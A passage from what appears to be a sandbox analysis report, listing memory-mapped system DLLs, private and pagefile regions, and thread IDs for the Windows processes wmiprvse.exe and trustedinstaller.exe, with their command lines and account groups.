end_va = 0x7ff974887fff entry_point = 0x7ff974830000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2351 start_va = 0x7ff973450000 end_va = 0x7ff973476fff entry_point = 0x7ff973450000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2352 start_va = 0x7ff9755b0000 end_va = 0x7ff9755f3fff entry_point = 0x7ff9755b0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2353 start_va = 0x9dfb5e0000 end_va = 0x9dfb5e2fff entry_point = 0x9dfb5e0000 region_type = mapped_file name = "wmi.dll" filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll") Region: id = 2354 start_va = 0x7ff971b50000 end_va = 0x7ff971b60fff entry_point = 0x7ff971b50000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2374 start_va = 0x9dfb5f0000 end_va = 0x9dfb6effff entry_point = 0x0 region_type = private name = "private_0x0000009dfb5f0000" filename = "" Region: id = 2375 start_va = 0x9dfb6f0000 end_va = 0x9dfb7effff entry_point = 0x0 region_type = private name = "private_0x0000009dfb6f0000" filename = "" Region: id = 2376 start_va = 0x7ff96f270000 end_va = 0x7ff96f27dfff entry_point = 0x7ff96f270000 region_type = mapped_file name = "perfos.dll" filename = "\\Windows\\System32\\perfos.dll" (normalized: "c:\\windows\\system32\\perfos.dll") Region: id = 2454 start_va = 0x9dfb7f0000 end_va = 0x9dfb7f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009dfb7f0000" filename = "" Region: id = 2455 start_va = 0x7ff96c3f0000 end_va = 0x7ff96c408fff entry_point = 0x7ff96c3f0000 region_type = mapped_file name = "msvcirt.dll" filename = "\\Windows\\System32\\msvcirt.dll" (normalized: "c:\\windows\\system32\\msvcirt.dll") Region: id = 2456 start_va = 0x7ff96c9b0000 end_va = 0x7ff96ca00fff entry_point = 0x7ff96c9b0000 region_type = mapped_file name = "provthrd.dll" filename = "\\Windows\\System32\\provthrd.dll" (normalized: "c:\\windows\\system32\\provthrd.dll") Region: id = 2457 start_va = 0x7ff96ca10000 end_va = 0x7ff96ca50fff entry_point = 0x7ff96ca10000 region_type = mapped_file name = "ntevt.dll" filename = "\\Windows\\System32\\wbem\\ntevt.dll" (normalized: "c:\\windows\\system32\\wbem\\ntevt.dll") Region: id = 2458 start_va = 0x7ff971910000 end_va = 0x7ff971974fff entry_point = 0x7ff971910000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2459 start_va = 0x7ff973ca0000 end_va = 0x7ff973cd1fff entry_point = 0x7ff973ca0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2596 start_va = 0x7ff96f230000 end_va = 0x7ff96f23efff entry_point = 0x7ff96f230000 region_type = mapped_file name = "cbsapi.dll" filename = "\\Windows\\servicing\\CbsApi.dll" (normalized: "c:\\windows\\servicing\\cbsapi.dll") Region: id = 2597 start_va = 0x7ff971f40000 end_va = 0x7ff971f4afff entry_point = 0x7ff971f40000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2598 start_va = 0x7ff971f50000 end_va = 0x7ff971f87fff entry_point = 0x7ff971f50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2599 start_va = 0x7ff96f5d0000 end_va = 0x7ff96f5e5fff entry_point = 0x7ff96f5d0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2600 start_va = 0x7ff96f5b0000 end_va = 0x7ff96f5c9fff entry_point = 0x7ff96f5b0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2601 start_va = 0x7ff973f10000 end_va = 0x7ff973fb7fff entry_point = 0x7ff973f10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Thread: id = 188 os_tid = 0xb60 Thread: id = 189 os_tid = 0x8c4 Thread: id = 190 os_tid = 0xb1c Thread: id = 191 os_tid = 0x2d8 Thread: id = 192 os_tid = 0x80c Thread: id = 193 os_tid = 0x610 Thread: id = 194 os_tid = 0x5f0 Thread: id = 195 os_tid = 0x234 Thread: id = 196 os_tid = 0x2cc Thread: id = 197 os_tid = 0x704 Process: id = "20" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x370bb000" os_pid = "0x304" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "18" os_parent_pid = "0x324" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Local Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0003c849" [0xc000000f] Region: id = 2377 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2378 start_va = 0xafd7170000 end_va = 0xafd717ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000afd7170000" filename = "" Region: id = 2379 start_va = 0xafd7180000 end_va = 0xafd7186fff entry_point = 0x0 region_type = private name = "private_0x000000afd7180000" filename = "" Region: id = 2380 start_va = 0xafd7190000 end_va = 0xafd71a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000afd7190000" filename = "" Region: id = 2381 start_va = 0xafd71b0000 end_va = 0xafd722ffff entry_point = 0x0 region_type = private name = "private_0x000000afd71b0000" filename = "" Region: id = 2382 start_va = 0xafd7230000 end_va = 0xafd7233fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000afd7230000" filename = "" Region: id = 2383 start_va = 0xafd7240000 end_va = 0xafd7240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000afd7240000" filename = "" Region: id = 2384 start_va = 0xafd7250000 end_va = 0xafd7251fff entry_point = 0x0 region_type = private name = "private_0x000000afd7250000" filename = "" Region: id = 2385 start_va = 0xafd7260000 end_va = 0xafd7266fff entry_point = 0x0 region_type = private name = "private_0x000000afd7260000" filename = "" Region: id = 2386 start_va = 0xafd7270000 end_va = 0xafd7270fff entry_point = 0x0 region_type = private name = "private_0x000000afd7270000" filename = "" Region: id = 2387 start_va = 0xafd7280000 end_va = 0xafd7280fff entry_point = 0x0 region_type = private name = "private_0x000000afd7280000" filename = "" Region: id = 2388 start_va = 0xafd7290000 end_va = 0xafd7294fff entry_point = 0xafd7290000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2389 start_va = 0xafd72a0000 end_va = 0xafd72a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000afd72a0000" filename = "" Region: id = 2390 start_va = 0xafd72b0000 end_va = 0xafd72b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000afd72b0000" filename = "" Region: id = 2391 start_va = 0xafd72c0000 end_va = 0xafd72c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000afd72c0000" filename = "" Region: id = 2392 start_va = 0xafd72d0000 end_va = 0xafd73cffff entry_point = 0x0 region_type = private name = "private_0x000000afd72d0000" filename = "" Region: id = 2393 start_va = 0xafd73d0000 end_va = 0xafd748dfff entry_point = 0xafd73d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2394 start_va = 0xafd7490000 end_va = 0xafd750ffff entry_point = 0x0 region_type = private name = "private_0x000000afd7490000" filename = "" Region: id = 2395 start_va = 0xafd7510000 end_va = 0xafd75cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000afd7510000" filename = "" Region: id = 2396 start_va = 0xafd75d0000 end_va = 0xafd764ffff entry_point = 0x0 region_type = private name = "private_0x000000afd75d0000" filename = "" Region: id = 2397 start_va = 0xafd7670000 end_va = 0xafd767ffff entry_point = 0x0 region_type = private name = "private_0x000000afd7670000" filename = "" Region: id = 2398 start_va = 0xafd7680000 end_va = 0xafd79b6fff entry_point = 0xafd7680000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2399 start_va = 0xafd79c0000 end_va = 0xafd7b47fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000afd79c0000" filename = "" Region: id = 2400 start_va = 0xafd7b50000 end_va = 0xafd7cd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000afd7b50000" filename = "" Region: id = 2401 start_va = 0xafd7ce0000 end_va = 0xafd7ddffff entry_point = 0x0 region_type = private name = "private_0x000000afd7ce0000" filename = "" Region: id = 2402 start_va = 0xafd7de0000 end_va = 0xafd7e5ffff entry_point = 0x0 region_type = private name = "private_0x000000afd7de0000" filename = "" Region: id = 2403 start_va = 0xafd7e60000 end_va = 0xafd7edffff entry_point = 0x0 region_type = private name = "private_0x000000afd7e60000" filename = "" Region: id = 2404 start_va = 0xafd7ee0000 end_va = 0xafd7f5ffff entry_point = 0x0 region_type = private name = "private_0x000000afd7ee0000" filename = "" Region: id = 2405 start_va = 0xafd7f60000 end_va = 0xafd7fdffff entry_point = 0x0 region_type = private name = "private_0x000000afd7f60000" filename = "" Region: id = 2406 start_va = 0xafd7fe0000 end_va = 0xafd805ffff entry_point = 0x0 region_type = private name = "private_0x000000afd7fe0000" filename = "" Region: id = 2407 start_va = 0x7df5ff840000 end_va = 0x7ff5ff83ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff840000" filename = "" Region: id = 2408 start_va = 0x7ff6624cc000 end_va = 0x7ff6624cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6624cc000" filename = "" Region: id = 2409 start_va = 0x7ff6624ce000 end_va = 0x7ff6624cffff entry_point = 0x0 region_type = private name = "private_0x00007ff6624ce000" filename = "" Region: id = 2410 start_va = 0x7ff6624d0000 end_va = 0x7ff6625cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6624d0000" filename = "" Region: id = 2411 start_va = 0x7ff6625d0000 end_va = 0x7ff6625f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6625d0000" filename = "" Region: id = 2412 start_va = 0x7ff6625f3000 end_va = 0x7ff6625f4fff entry_point = 0x0 region_type = private name = "private_0x00007ff6625f3000" filename = "" Region: id = 2413 start_va = 0x7ff6625f5000 end_va = 0x7ff6625f6fff entry_point = 0x0 region_type = private name = "private_0x00007ff6625f5000" filename = "" Region: id = 2414 start_va = 0x7ff6625f7000 end_va = 0x7ff6625f7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6625f7000" filename = "" Region: id = 2415 start_va = 0x7ff6625f8000 end_va = 0x7ff6625f9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6625f8000" filename = "" Region: id = 2416 start_va = 0x7ff6625fa000 end_va = 0x7ff6625fbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6625fa000" filename = "" Region: id = 2417 start_va = 0x7ff6625fc000 end_va = 0x7ff6625fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6625fc000" filename = "" Region: id = 2418 start_va = 0x7ff6625fe000 end_va = 0x7ff6625fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6625fe000" filename = "" Region: id = 2419 start_va = 0x7ff662ba0000 end_va = 0x7ff662c1efff entry_point = 0x7ff662ba0000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 2420 start_va = 0x7ff96af80000 end_va = 0x7ff96af95fff entry_point = 0x7ff96af80000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2421 start_va = 0x7ff96b4a0000 end_va = 0x7ff96b4b3fff entry_point = 0x7ff96b4a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2422 start_va = 0x7ff96b7d0000 end_va = 0x7ff96b8c7fff entry_point = 0x7ff96b7d0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2423 start_va = 0x7ff96c2d0000 end_va = 0x7ff96c2e0fff entry_point = 0x7ff96c2d0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2424 start_va = 0x7ff96df20000 end_va = 0x7ff96df9efff entry_point = 0x7ff96df20000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2425 start_va = 0x7ff973e20000 end_va = 0x7ff973e52fff entry_point = 0x7ff973e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2426 start_va = 0x7ff9741d0000 end_va = 0x7ff9741e6fff entry_point = 0x7ff9741d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2427 start_va = 0x7ff974340000 end_va = 0x7ff97434afff entry_point = 0x7ff974340000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2428 start_va = 0x7ff974720000 end_va = 0x7ff97478afff entry_point = 0x7ff974720000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2429 start_va = 0x7ff9748a0000 end_va = 0x7ff9748c7fff entry_point = 0x7ff9748a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2430 start_va = 0x7ff9749a0000 end_va = 0x7ff9749aefff entry_point = 0x7ff9749a0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2431 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2432 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2433 start_va = 0x7ff976f70000 end_va = 0x7ff976f77fff entry_point = 0x7ff976f70000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2434 start_va = 0x7ff976f80000 end_va = 0x7ff977025fff entry_point = 0x7ff976f80000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2435 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2436 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2437 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2438 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2439 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2440 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2441 start_va = 0x7ff977cb0000 end_va = 0x7ff977d18fff entry_point = 0x7ff977cb0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2442 start_va = 0x7ff977d40000 end_va = 0x7ff977de4fff entry_point = 0x7ff977d40000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2443 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2444 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2445 start_va = 0xafd8060000 end_va = 0xafd80dffff entry_point = 0x0 region_type = private name = "private_0x000000afd8060000" filename = "" Region: id = 2446 start_va = 0x7ff6624ca000 end_va = 0x7ff6624cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6624ca000" filename = "" Region: id = 2447 start_va = 0x7ff96b470000 end_va = 0x7ff96b494fff entry_point = 0x7ff96b470000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2448 start_va = 0x7ff96b8d0000 end_va = 0x7ff96b942fff entry_point = 0x7ff96b8d0000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 2449 start_va = 0x7ff96f240000 end_va = 0x7ff96f266fff entry_point = 0x7ff96f240000 region_type = mapped_file name = "stdprov.dll" filename = "\\Windows\\System32\\wbem\\stdprov.dll" (normalized: "c:\\windows\\system32\\wbem\\stdprov.dll") Region: id = 2450 start_va = 0x7ff973ca0000 end_va = 0x7ff973cd1fff entry_point = 0x7ff973ca0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2451 start_va = 0x7ff974000000 end_va = 0x7ff97401efff entry_point = 0x7ff974000000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2452 start_va = 0x7ff974520000 end_va = 0x7ff97454bfff entry_point = 0x7ff974520000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2453 start_va = 0x7ff974980000 end_va = 0x7ff974992fff entry_point = 0x7ff974980000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Thread: id = 200 os_tid = 0xb98 Thread: id = 201 os_tid = 0xb9c Thread: id = 202 os_tid = 0xb90 Thread: id = 203 os_tid = 0xb8c Thread: id = 204 os_tid = 0x330 Thread: id = 205 os_tid = 0x300 Thread: id = 206 os_tid = 0x2fc Thread: id = 207 os_tid = 0xb80 Thread: id = 208 os_tid = 0xb84 Process: id = "21" image_name = "trustedinstaller.exe" filename = "c:\\windows\\servicing\\trustedinstaller.exe" page_root = "0x376aa000" os_pid = "0xb88" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "19" os_parent_pid = "0x3ec" cmd_line = "C:\\Windows\\servicing\\TrustedInstaller.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\TrustedInstaller" [0xe], "NT AUTHORITY\\Logon Session 00000000:0003ce24" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2460 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2461 start_va = 0x3462b00000 end_va = 0x3462b0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003462b00000" filename = "" Region: id = 2462 start_va = 0x3462b10000 end_va = 0x3462b16fff entry_point = 0x0 region_type = private name = "private_0x0000003462b10000" filename = "" Region: id = 2463 start_va = 0x3462b20000 end_va = 0x3462b33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003462b20000" filename = "" Region: id = 2464 start_va = 0x3462b40000 end_va = 0x3462bbffff entry_point = 0x0 region_type = private name = "private_0x0000003462b40000" filename = "" Region: id = 2465 start_va = 0x3462bc0000 end_va = 0x3462bc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003462bc0000" filename = "" Region: id = 2466 start_va = 0x3462bd0000 end_va = 0x3462bd1fff entry_point = 0x0 region_type = private name = "private_0x0000003462bd0000" filename = "" Region: id = 2467 start_va = 0x3462be0000 end_va = 0x3462c5ffff entry_point = 0x0 region_type = private name = "private_0x0000003462be0000" filename = "" Region: id = 2468 start_va = 0x3462c60000 end_va = 0x3462c66fff entry_point = 0x0 region_type = private name = "private_0x0000003462c60000" filename = "" Region: id = 2469 start_va = 0x3462c70000 end_va = 0x3462c77fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003462c70000" filename = "" Region: id = 2470 start_va = 0x3462c80000 end_va = 0x3462c80fff entry_point = 0x3462c80000 region_type = mapped_file name = "trustedinstaller.exe.mui" filename = "\\Windows\\servicing\\en-US\\TrustedInstaller.exe.mui" (normalized: "c:\\windows\\servicing\\en-us\\trustedinstaller.exe.mui") Region: id = 2471 start_va = 0x3462c90000 end_va = 0x3462d8ffff entry_point = 0x0 region_type = private name = "private_0x0000003462c90000" filename = "" Region: id = 2472 start_va = 0x3462d90000 end_va = 0x3462e4dfff entry_point = 0x3462d90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2473 start_va = 0x3462e50000 end_va = 0x3462e50fff entry_point = 0x0 region_type = private name = "private_0x0000003462e50000" filename = "" Region: id = 2474 start_va = 0x3462e60000 end_va = 0x3462e60fff entry_point = 0x0 region_type = private name = "private_0x0000003462e60000" filename = "" Region: id = 2475 start_va = 0x3462e70000 end_va = 0x3462e70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003462e70000" filename = "" Region: id = 2476 start_va = 0x3462eb0000 end_va = 0x3462ebffff entry_point = 0x0 region_type = private name = "private_0x0000003462eb0000" filename = "" Region: id = 2477 start_va = 0x3462ec0000 end_va = 0x3462f3ffff entry_point = 0x0 region_type = private name = "private_0x0000003462ec0000" filename = "" Region: id = 2478 start_va = 0x3462f40000 end_va = 0x34630c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003462f40000" filename = "" Region: id = 2479 start_va = 0x34630d0000 end_va = 0x3463250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000034630d0000" filename = "" Region: id = 2480 start_va = 0x3463260000 end_va = 0x346331ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003463260000" filename = "" Region: id = 2481 start_va = 0x3463320000 end_va = 0x3463656fff entry_point = 0x3463320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2482 start_va = 0x3463660000 end_va = 0x34636dffff entry_point = 0x0 region_type = private name = "private_0x0000003463660000" filename = "" Region: id = 2483 start_va = 0x34636e0000 end_va = 0x346375ffff entry_point = 0x0 region_type = private name = "private_0x00000034636e0000" filename = "" Region: id = 2484 start_va = 0x3463760000 end_va = 0x34637dffff entry_point = 0x0 region_type = private name = "private_0x0000003463760000" filename = "" Region: id = 2485 start_va = 0x7df5fff90000 end_va = 0x7ff5fff8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff90000" filename = "" Region: id = 2486 start_va = 0x7ff65491e000 end_va = 0x7ff65491ffff entry_point = 0x0 region_type = private name = "private_0x00007ff65491e000" filename = "" Region: id = 2487 start_va = 0x7ff654920000 end_va = 0x7ff654a1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff654920000" filename = "" Region: id = 2488 start_va = 0x7ff654a20000 end_va = 0x7ff654a42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff654a20000" filename = "" Region: id = 2489 start_va = 0x7ff654a44000 end_va = 0x7ff654a45fff entry_point = 0x0 region_type = private name = "private_0x00007ff654a44000" filename = "" Region: id = 2490 start_va = 0x7ff654a46000 end_va = 0x7ff654a47fff entry_point = 0x0 region_type = private name = "private_0x00007ff654a46000" filename = "" Region: id = 2491 start_va = 0x7ff654a48000 end_va = 0x7ff654a49fff entry_point = 0x0 region_type = private name = "private_0x00007ff654a48000" filename = "" Region: id = 2492 start_va = 0x7ff654a4a000 end_va = 0x7ff654a4bfff entry_point = 0x0 region_type = private name = "private_0x00007ff654a4a000" filename = "" Region: id = 2493 start_va = 0x7ff654a4c000 end_va = 0x7ff654a4cfff entry_point = 0x0 region_type = private name = "private_0x00007ff654a4c000" filename = "" Region: id = 2494 start_va = 0x7ff654a4e000 end_va = 0x7ff654a4ffff entry_point = 0x0 region_type = private name = "private_0x00007ff654a4e000" filename = "" Region: id = 2495 start_va = 0x7ff654a70000 end_va = 0x7ff654a90fff entry_point = 0x7ff654a70000 region_type = mapped_file name = "trustedinstaller.exe" filename = "\\Windows\\servicing\\TrustedInstaller.exe" (normalized: "c:\\windows\\servicing\\trustedinstaller.exe") Region: id = 2496 start_va = 0x7ff96a3c0000 end_va = 0x7ff96a549fff entry_point = 0x7ff96a3c0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2497 start_va = 0x7ff96c310000 end_va = 0x7ff96c350fff entry_point = 0x7ff96c310000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\wdscore.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16384_none_115fd2f761f7c508\\wdscore.dll") Region: id = 2498 start_va = 0x7ff96c3c0000 end_va = 0x7ff96c3e4fff entry_point = 0x7ff96c3c0000 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\System32\\dbgcore.dll" (normalized: "c:\\windows\\system32\\dbgcore.dll") Region: id = 2499 start_va = 0x7ff973e20000 end_va = 0x7ff973e52fff entry_point = 0x7ff973e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2500 start_va = 0x7ff9741d0000 end_va = 0x7ff9741e6fff entry_point = 